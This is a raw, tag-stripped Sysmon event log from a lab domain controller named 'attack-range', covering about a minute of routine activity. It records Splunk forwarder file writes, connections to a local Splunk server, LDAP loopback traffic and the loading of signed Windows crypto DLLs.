Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=566CF10003AF94F825287C2B8329C241,SHA256=6319775FA9C4C1071CFF329FBCC2BF14B05B509DA9E99553803B12DAF64000F5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x8000000000000000100448Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:08.034{326FD73D-A455-6294-3701-000000005502}6180C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53354-false10.0.1.12-8000- 23542300x8000000000000000100450Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:13.075{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A453E26E87E0E1238D89E8CEA99CEC83,SHA256=1770D7107132B53C0E35A2BAF72518433A1D34180D1FECA385831AFF9988C0EA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100451Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:14.169{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D31AE85BD18980B36D92BC4412219C2A,SHA256=F8933211ACBAA1FCD47E497A5E69A15112306BD72E69164613FFD4E5F9A05E02,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100452Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:15.263{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=917F5B4C2B5F13DBA5038F4026BA67ED,SHA256=DDFFC5E18647ABD971F9DB8176E8F324B8948ABB1243F160AE372EAED4E744EF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100453Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:16.356{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2DCF21D6EF8B9150AF0EBB7A7EFD724F,SHA256=1F4E9C77B963E244D739053B8C44FB795B0C39FC9DABDD785896F77B234DFD75,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100454Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:17.450{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2CB748103F5DC223EB28C1D91080B5A0,SHA256=F015A959B0BAC23B121E4D8F1C831D2FE7A39D7BC74E248C1FFA9823F68824C8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100457Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:18.544{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A93277C2E13CDD0AA67B281D6826C7B0,SHA256=D320EBAD7B4E30230C45FD2CF4B0FBB527B1154200014949838C369565184761,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x8000000000000000100456Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:14.065{326FD73D-A455-6294-3701-000000005502}6180C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53355-false10.0.1.12-8000- 23542300x8000000000000000100455Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:18.169{326FD73D-A44C-6294-0501-000000005502}5164NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=0B1622EC8744996986865678E623934B,SHA256=C72B8B880641806B11E3E04732987E1A22933D291E9CE385679267D1E257FFC8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100459Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:19.638{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9610342072BF7AEEB7022D7325C91486,SHA256=63BED5FA93252E7FD2886F61FEE416739D70E1E59C9AAEAA4C38C4F712AA4709,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100458Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:19.091{326FD73D-A254-6294-1100-000000005502}104NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=48833C332CD1549A3FB8D8B8DBFB1FDB,SHA256=9B9E3EDD0DA998DD9FC501D1026A02A04D03451806A85FEB93B9B8F1C04A0A1B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100460Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:20.731{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F32BB2B52C9858777D6957099968A62B,SHA256=D31E658D81A651E70F2CD5BAA7EE94B0BC6686A8B0EE4C1CEB4C7928A973E5F3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100461Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:21.825{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F9964AE6C1BF5CD75856DA2F2527E3DE,SHA256=281B1231BCAE1B93214AAAC93FB11AA5BDE27F7EAEF2F3CD51CF9597801E4B58,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100462Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:22.919{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F4F374D9AEAD40E1A418775518790973,SHA256=F73C38F1CCB442917A3A412C5EDD8696E1931E502EF6E76A5C7B416629B27D69,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100464Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:23.685{326FD73D-A44C-6294-0501-000000005502}5164NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=B815FDBF3105A0143C61AE82F95AAF1E,SHA256=95D93950BC72E3B7DDB3127D4556C8DC830B74A59CF059DD284FB46B71551B09,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x8000000000000000100463Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:19.115{326FD73D-A455-6294-3701-000000005502}6180C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53356-false10.0.1.12-8000- 23542300x8000000000000000100465Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:24.013{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=369A9DA304EDC871D60DDC1176AE9570,SHA256=EA0FC15747D271AECA699A764B71E0307192C57B117850174C249CAD1E1CFE7B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x8000000000000000100467Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:21.596{326FD73D-A44C-6294-0501-000000005502}5164C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53357-false10.0.1.12-8089- 23542300x8000000000000000100466Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:25.106{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EA41CC774646FAE40AA3F6CE2EE1A9D1,SHA256=91EDAC83A9D6BAACAE516F32C96E6BF6CA40D9369328D6DC1599ACE6EEEA2855,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100468Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:26.200{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BC420AB66FA34A764D1B637DA62212BB,SHA256=C94A698DD439BED5C79EA270496321CFFAA25819F4C872ABC05EEE9A2536037D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100469Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:27.294{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3477A5C8E52E6B4374A87A24FDF7C5B7,SHA256=4DD1CFB357EDAB5DBDF35441793912B782EF9ABE6915817F106553B4970D8A9F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100470Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:28.388{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EA481D6F63513D7B29AD689F2739F81C,SHA256=19281A11160CD512F34FA2AA896C67D53BF4771039026DBA0FA1069418E159D8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100474Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:29.481{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=453429F6341C437B998FB4C370A19696,SHA256=5909D3E972DE567BBB6B8FF7C66719BB51779A555BB4403B67B4DBAF34B465CA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x8000000000000000100473Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:25.096{326FD73D-A455-6294-3701-000000005502}6180C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53358-false10.0.1.12-8000- 354300x8000000000000000100472Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:25.022{326FD73D-A251-6294-0100-000000005502}4SystemNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.255-138netbios-dgmfalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local138netbios-dgm 354300x8000000000000000100471Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:25.022{326FD73D-A251-6294-0100-000000005502}4SystemNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local138netbios-dgmfalse10.0.1.255-138netbios-dgm 23542300x8000000000000000100475Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:30.575{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=52940039EECCDF0171C3051C2F2E3A52,SHA256=B4BF80AC80EC75656811CAF6CAA28483DBC1762FEE81A3EFE3E754FE9A3ED27C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100476Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:31.669{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FEEC9A5C8F17FD6FB25F423B62C27BB4,SHA256=F9873DDE44BF3B74D355499295E54A9F54012D3E0047F33FE1002B6C06C294F3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100477Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:32.763{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CFA3C99FAEBA7AC847F3E0C468AC5AC6,SHA256=FBD41A871DE8DF2E1DC3389B650BDC44711C4ECE702888A386090D585F2758B3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100478Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:33.856{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BA38E5230035A4DB5A37D7A09E7C1A83,SHA256=67BE1B561B81FC0420025425C6D4F8E6ED798FD3D3B8449FD935B6DDF93DB547,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100480Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:34.950{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7D04C3E2EE139F0794707E739A06B598,SHA256=2CB641993DF1B9CB0087E2DDFF3B8A3BAE2FF57991371E88B2FD58A2E926E985,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x8000000000000000100479Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:31.112{326FD73D-A455-6294-3701-000000005502}6180C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53359-false10.0.1.12-8000- 23542300x8000000000000000100481Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:36.044{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BD6A749394F070152D36744CFB9C510F,SHA256=BC47C5AA66F16DF5F5E7A446358445623FE3B89D7F93A8DD06BD19431C28C038,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100482Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:37.137{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=80E36D128609CF38CA33E10BC1C1B9A2,SHA256=D74721DAA58E660035B7F5002F7DB467F2B0B973DC7DAFF0E813186D04F2436B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100483Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:38.231{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D2D175536ED4E8C760982F50AED4D6E9,SHA256=B10F48899C2E4866791C151575559A1294B7D162DBFB48BB169E9AA009A1EC57,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100484Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:39.325{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4E79D5BE7D49DD0D7A0D811FC9A486F1,SHA256=E203D1D1FBCAC1F8FDBB6728A48F85976221F19CFD947F356DF8C3CB765C97D4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100485Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:40.419{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BA03DD8835D78FE388ED6724BD30F15E,SHA256=152FC785A5F23361E7CC324B86A2A21D4C5B86ECD3D5F0BBE8658CECFFDC5136,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100487Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:41.512{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A908F72CE139885135BA506B1468B1A5,SHA256=1B35CBF0C5471B6B6162A4C88DD93AD9D2F6AD5BFDBC1D3A01FA467F6F92AB3E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x8000000000000000100486Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:37.018{326FD73D-A455-6294-3701-000000005502}6180C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-994.attackrange.local53360-false10.0.1.12-8000- 23542300x8000000000000000100489Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:42.606{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FC8BDB7B258FF5CDFDDE817216D59558,SHA256=FF3C2E0826C349939582084FAD661F62A58BE152C2168DB9DE8A33F0AC43B318,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 13241300x8000000000000000100488Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-SetValue2022-05-30 13:06:42.028{326FD73D-A254-6294-1000-000000005502}412C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d87426-0x1b22fd0b) 23542300x8000000000000000100491Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:43.700{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=78DB24C2C1A31AF56891DD9BE9026663,SHA256=9A1333A1409D658F6B11B4C3FB4701669FA9717A7E8C385432898B505271CC5C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100490Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:43.669{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D1F79AFB444B065E7A5D966FE8643FDE,SHA256=0414FD84B2F90C19325D97D82F1206214BE176B99C8EB43F4DCBF32FCB7AAFE6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x8000000000000000100494Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:44.794{326FD73D-A45C-6294-5601-000000005502}6368NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=08C2A3673FCA77EDF0A4E5002E221E85,SHA256=7E532506BD7B0355316EDD539206954958C753A70C97B4003486B43F42B79AA6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x8000000000000000100493Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:40.424{326FD73D-A253-6294-0B00-000000005502}632C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-994.attackrange.local53361-true0:0:0:0:0:0:0:1win-dc-ctus-attack-range-994.attackrange.local389ldap 354300x8000000000000000100492Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:40.424{326FD73D-A262-6294-2300-000000005502}2720C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-994.attackrange.local53361-true0:0:0:0:0:0:0:1win-dc-ctus-attack-range-994.attackrange.local389ldap 734700x8000000000000000100543Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:45.923{326FD73D-C165-6294-470B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FE,IMPHASH=9E9C9DFD04CDDF2B6F1412BF096AEAF4trueMicrosoft WindowsValid 734700x8000000000000000100542Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:45.907{326FD73D-C165-6294-470B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=28140830C342F475A597B2D54C42DFFA,SHA256=99E23D0177C6DC59AD72DEEC46CFB995828EF567F001261BC65532B6DDEAD862,IMPHASH=C918D75BDB7774C087BB6C0C9C0A7686trueMicrosoft WindowsValid 734700x8000000000000000100541Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:45.907{326FD73D-C165-6294-470B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778C,IMPHASH=96CBD1B5C0EA88B677BA3BB5FD009869trueMicrosoft WindowsValid 734700x8000000000000000100540Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:45.907{326FD73D-C165-6294-470B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\srvcli.dll10.0.14393.5066 (rs1_release.220401-1841)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=75E3DE473374E0BCBBD1EC60036A93EC,SHA256=23EBE577D2080D4C7532184B69E44BF640BB44084F9046A5AF364268A7BDB1EC,IMPHASH=6CC8301D560C9DC6CB13A6320F3A3B1FtrueMicrosoft WindowsValid 734700x8000000000000000100539Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-994.attackrange.local-2022-05-30 13:06:45.907{326FD73D-C165-6294-470B-000000005502}2040C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74,IMPHASH=7C2E79D83754439DC7DE7882DCB4238DtrueMicrosoft 